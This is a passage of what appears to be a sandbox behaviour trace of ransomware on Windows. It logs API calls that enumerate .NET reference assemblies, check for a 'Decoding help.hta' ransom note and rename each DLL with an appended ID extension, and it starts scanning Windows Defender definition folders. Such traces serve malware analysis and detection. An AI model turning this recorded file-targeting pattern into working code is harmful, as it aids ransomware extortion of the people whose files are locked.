Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\decoding help.hta")) returned 0x1 [0057.479] lstrcmpiW (lpString1="Decoding help.hta", lpString2="System.Web.Extensions.Design.dll") returned -1 [0057.479] lstrlenW (lpString="System.Web.Extensions.Design.dll") returned 32 [0057.479] lstrcmpiW (lpString1="[ID]", lpString2=".dll") returned 1 [0057.479] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0057.479] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 70 [0057.479] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="System.Web.Extensions.Design.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Extensions.Design.dll") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Extensions.Design.dll" [0057.479] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Extensions.Design.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Extensions.Design.dll") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Extensions.Design.dll" [0057.479] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Extensions.Design.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Extensions.Design.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Extensions.Design.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0057.479] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Extensions.Design.dll" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\system.web.extensions.design.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Extensions.Design.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\system.web.extensions.design.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0057.480] FindNextFileW (in: hFindFile=0x5e2cb0, lpFindFileData=0x16b9fd30 | out: lpFindFileData=0x16b9fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xab7cf064, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xab7cf064, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xabd0408e, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x138000, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.Web.Extensions.dll", cAlternateFileName="")) returned 1 [0057.480] lstrcpyW (in: lpString1=0x971a1c8, lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0057.480] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 70 [0057.480] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" [0057.480] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\decoding help.hta")) returned 0x1 [0057.480] lstrcmpiW (lpString1="Decoding help.hta", lpString2="System.Web.Extensions.dll") returned -1 [0057.480] lstrlenW (lpString="System.Web.Extensions.dll") returned 25 [0057.480] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0057.480] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 70 [0057.480] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="System.Web.Extensions.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Extensions.dll") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Extensions.dll" [0057.480] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Extensions.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Extensions.dll") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Extensions.dll" [0057.480] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Extensions.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Extensions.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Extensions.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0057.480] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Extensions.dll" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\system.web.extensions.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Extensions.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\system.web.extensions.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0057.480] FindNextFileW (in: hFindFile=0x5e2cb0, lpFindFileData=0x16b9fd30 | out: lpFindFileData=0x16b9fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae97fc00, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xae97fc00, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xae97fc00, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xf000, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.Web.Routing.dll", cAlternateFileName="")) returned 1 [0057.480] lstrcpyW (in: lpString1=0x971a1c8, lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0057.480] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 70 [0057.480] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" [0057.480] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\decoding help.hta")) returned 0x1 [0057.481] lstrcmpiW (lpString1="Decoding help.hta", lpString2="System.Web.Routing.dll") returned -1 [0057.481] lstrlenW (lpString="System.Web.Routing.dll") returned 22 [0057.481] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0057.481] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 70 [0057.481] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="System.Web.Routing.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Routing.dll") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Routing.dll" [0057.481] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Routing.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Routing.dll") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Routing.dll" [0057.481] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Routing.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Routing.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Routing.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0057.481] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Routing.dll" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\system.web.routing.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Routing.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\system.web.routing.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0057.481] FindNextFileW (in: hFindFile=0x5e2cb0, lpFindFileData=0x16b9fd30 | out: lpFindFileData=0x16b9fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a316a7b, ftCreationTime.dwHighDateTime=0x1c9ea0a, ftLastAccessTime.dwLowDateTime=0x6a316a7b, ftLastAccessTime.dwHighDateTime=0x1c9ea0a, ftLastWriteTime.dwLowDateTime=0x6a33cbd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x3000, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.Windows.Presentation.dll", cAlternateFileName="")) returned 1 [0057.481] lstrcpyW (in: lpString1=0x971a1c8, lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0057.481] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 70 [0057.481] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" [0057.481] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\decoding help.hta")) returned 0x1 [0057.481] lstrcmpiW (lpString1="Decoding help.hta", lpString2="System.Windows.Presentation.dll") returned -1 [0057.481] lstrlenW (lpString="System.Windows.Presentation.dll") returned 31 [0057.481] lstrcmpiW (lpString1="[ID]", lpString2=".dll") returned 1 [0057.481] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0057.481] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 70 [0057.481] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="System.Windows.Presentation.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Windows.Presentation.dll") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Windows.Presentation.dll" [0057.481] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Windows.Presentation.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Windows.Presentation.dll") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Windows.Presentation.dll" [0057.481] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Windows.Presentation.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Windows.Presentation.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Windows.Presentation.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0057.482] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Windows.Presentation.dll" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\system.windows.presentation.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Windows.Presentation.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\system.windows.presentation.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.886] FindNextFileW (in: hFindFile=0x5e2cb0, lpFindFileData=0x16b9fd30 | out: lpFindFileData=0x16b9fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa96ee048, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa96ee048, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa97141a8, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x75000, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.WorkflowServices.dll", cAlternateFileName="")) returned 1 [0058.886] lstrcpyW (in: lpString1=0x2a6a0048, lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0058.886] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 70 [0058.886] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" [0058.886] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\decoding help.hta")) returned 0x1 [0058.886] lstrcmpiW (lpString1="Decoding help.hta", lpString2="System.WorkflowServices.dll") returned -1 [0058.886] lstrlenW (lpString="System.WorkflowServices.dll") returned 27 [0058.886] lstrcmpiW (lpString1="[ID]", lpString2=".dll") returned 1 [0058.886] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0058.886] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 70 [0058.886] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="System.WorkflowServices.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.WorkflowServices.dll") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.WorkflowServices.dll" [0058.886] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.WorkflowServices.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.WorkflowServices.dll") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.WorkflowServices.dll" [0058.886] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.WorkflowServices.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.WorkflowServices.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.WorkflowServices.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0058.886] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.WorkflowServices.dll" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\system.workflowservices.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.WorkflowServices.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\system.workflowservices.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.886] FindNextFileW (in: hFindFile=0x5e2cb0, lpFindFileData=0x16b9fd30 | out: lpFindFileData=0x16b9fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xad0cd792, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xad0cd792, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xad2e2ad6, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x22000, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.Xml.Linq.dll", cAlternateFileName="")) returned 1 [0058.886] lstrcpyW (in: lpString1=0x2a6a0048, lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0058.887] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 70 [0058.887] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" [0058.887] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\decoding help.hta")) returned 0x1 [0058.887] lstrcmpiW (lpString1="Decoding help.hta", lpString2="System.Xml.Linq.dll") returned -1 [0058.887] lstrlenW (lpString="System.Xml.Linq.dll") returned 19 [0058.887] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0058.887] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 70 [0058.887] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="System.Xml.Linq.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Xml.Linq.dll") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Xml.Linq.dll" [0058.887] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Xml.Linq.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Xml.Linq.dll") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Xml.Linq.dll" [0058.887] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Xml.Linq.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Xml.Linq.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Xml.Linq.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0058.887] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Xml.Linq.dll" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\system.xml.linq.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Xml.Linq.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\system.xml.linq.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.887] FindNextFileW (in: hFindFile=0x5e2cb0, lpFindFileData=0x16b9fd30 | out: lpFindFileData=0x16b9fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xad0cd792, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xad0cd792, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xad2e2ad6, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x22000, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.Xml.Linq.dll", cAlternateFileName="")) returned 0 [0058.887] FindClose (in: hFindFile=0x5e2cb0 | out: hFindFile=0x5e2cb0) returned 1 Thread: id = 561 os_tid = 0xd08 [0048.474] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\*.*", lpFindFileData=0x16c9fd30 | out: lpFindFileData=0x16c9fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1fb3099, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x1fb3099, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d8b50 [0050.387] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0050.387] FindNextFileW (in: hFindFile=0x5d8b50, lpFindFileData=0x16c9fd30 | out: lpFindFileData=0x16c9fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1fb3099, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x1fb3099, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0050.387] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0050.387] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0050.387] FindNextFileW (in: hFindFile=0x5d8b50, lpFindFileData=0x16c9fd30 | out: lpFindFileData=0x16c9fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Backup", cAlternateFileName="")) returned 1 [0050.387] lstrcmpW (lpString1=".", lpString2="Backup") returned -1 [0050.387] lstrcmpW (lpString1="..", lpString2="Backup") returned -1 [0050.387] lstrcmpiW (lpString1="windows", lpString2="Backup") returned 1 [0050.387] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\*.*" [0050.387] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\*.*") returned 68 [0050.387] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\", lpString2="Backup" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Backup") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Backup" [0050.387] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Backup", lpString2="\\*.*" | out: 